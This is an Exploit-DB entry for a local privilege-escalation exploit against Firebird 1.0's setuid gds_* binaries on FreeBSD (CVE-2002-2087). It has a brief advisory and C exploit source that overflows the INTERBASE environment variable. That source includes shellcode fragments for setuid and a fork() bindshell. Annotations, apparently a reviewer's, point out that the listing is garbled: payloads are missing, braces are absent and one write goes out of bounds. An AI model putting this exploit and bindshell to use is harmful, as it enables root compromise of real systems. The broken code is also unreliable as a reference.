Firebird 1.0 GDS_Inet_Server Interbase Environment Variable Buffer Overflow Vulnerability

ID EDB-ID:22580
Type exploitdb
Reporter bob
Modified 2003-05-10T00:00:00


Firebird 1.0 GDS_Inet_Server Interbase Environment Variable Buffer Overflow Vulnerability. CVE-2002-2087. Local exploit for the FreeBSD platform


Interbase is a database distributed and maintained by Borland. It is available for Unix and Linux operating systems. As Firebird is based on Borland/Inprise Interbase source code, it is very likely that Interbase is prone to this issue also.

A buffer overflow has been discovered in the setuid root program gds_inet_server, packaged with Firebird. The program can be invoked by a local user with strings of arbitrary length. Using a specially crafted string, the attacker could overwrite stack memory, including a function's return address, and potentially execute arbitrary code as root.

/* DSR-olbird.c by

Same exploit as DSR-firebird.c, except that this version
exploits Firebird 1.0.0 as shipped with FreeBSD.

[diff] ret addr && LEN [/diff]

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* Paths of the three setuid Firebird binaries that main() exec()s; the
 * oversized INTERBASE value built in main() is inherited by whichever one
 * is run. */
#define LOCK    "/usr/local/firebird/bin/gds_lock_mgr"
#define DROP    "/usr/local/firebird/bin/gds_drop"
#define INET    "/usr/local/firebird/bin/gds_inet_server"
/* Length of the INTERBASE value; main() places the return address at
 * offset 1028 inside it. */
#define LEN     1032

/* Payload for gds_drop.  The byte string is absent from this listing (the
 * initializer is empty), so the file does not compile as shown. */
char dropcode[]=

/* Payload for gds_inet_server; likewise absent from this listing. */
char inetcode[]=


/* Payload for gds_lock_mgr.  Only two fragments survived extraction and the
 * initializer is never terminated with a semicolon. */
char lockcode[]= 
	"\x31\xc0\x50\x6a\x5a\x53\xb0\x17\xcd\x80" //setuid[firebird] by bob
	"\x31\xc0\x31\xdb\x53\xb3\x06\x53" //fork() bindshell by eSDee

/* Map the target number given on the command line ("1", "2" or "3") to the
 * payload array for that binary.  The body's braces are missing from this
 * listing.  NOTE(review): no return covers any other argument, so for
 * anything else the value read by the caller is indeterminate; a NULL
 * argument (argc < 2 in main) reaches strcmp() and is undefined behaviour. */
char *decide(char *string)
    if(!(strcmp(string, "1")))
      return((char *)&inetcode);
    if(!(strcmp(string, "2")))
      return((char *)&lockcode);
    if(!(strcmp(string, "3")))
      return((char *)&dropcode);

/* Build an oversized INTERBASE value, export it, then exec the selected
 * setuid binary, which inherits the environment.
 *
 * The listing is brace-less as extracted: the argc check does not exit,
 * and each exec branch falls through to "return 0".
 *
 * Defender's reading: the observable trigger is a process exporting a
 * roughly 1 KiB INTERBASE value immediately before exec of one of the
 * three gds_* binaries.  The fix belongs in the setuid programs (a bounded
 * copy of that variable) or in removing the setuid bit from them. */
int main(int argc, char **argv)
	unsigned long ret = 0xbfbff75d;	/* single hard-coded value used for every target, although the usage text lists one per target */
	char *selectcode;	/* payload array chosen by decide() */
	char buffer[LEN];	/* becomes the INTERBASE value */
	char egg[1024];		/* NOP sled + payload; built below but never referenced again in this listing */
	char *ptr;
	int i=0;


	if(argc < 2)
		printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n"); 
		printf("( (                           by - ) )\n");
		printf("Usage: %s <target#> \n", argv[0]);
		printf("1. [0xbfbff75c] - gds_inet_server\n");
		printf("2. [0xbfbff75d] - gds_lock_mgr\n");
		printf("3. [0xbfbff75e] - gds_drop\n");
	/* NOTE(review): reached even when argc < 2 (no braces, no exit above),
	 * in which case argv[1] is NULL. */
	selectcode = (char *)decide(argv[1]);
  	memset(buffer, 0x41, sizeof(buffer));	/* filler byte 'A'; no terminator is written within LEN */

        ptr = egg;

        /* 0x90 is the x86 NOP; the sled fills egg up to the payload. */
        for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
        for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
        egg[1024 - 1] = '\0';


        /* Four bytes of ret are written at offset 1028 of the LEN-byte buffer. */
        memcpy(&buffer[1028],(char *)&ret,4);
        /* NOTE(review): index 1032 == LEN, one past the end of buffer[LEN] —
         * an out-of-bounds write (undefined behaviour). */
        buffer[1032] = 0;

        /* The overflowing value reaches the target only through the
         * environment inherited by execl() below. */
        setenv("INTERBASE", buffer, 1);

        fprintf(stdout, "Return Address: 0x%x\n", ret);	/* %x with an unsigned long: should be %lx */
        fprintf(stdout, "Buffer Size: %d\n", LEN);
        fprintf(stdout, "Setuid [90]\n");

/* Each branch replaces this process with the chosen setuid binary;
 * "return 0" is reached only if execl() fails. */
if(selectcode == (char *)&inetcode)
	execl(INET, INET, NULL);
	return 0;

if(selectcode == (char *)&lockcode)
 	printf("\nShell is on port 45295\nExploit will hang!\n");
	execl(LOCK, LOCK, NULL);
	return 0;

if(selectcode == (char *)&dropcode)
	execl(DROP, DROP, NULL);
	return 0;

	return 0;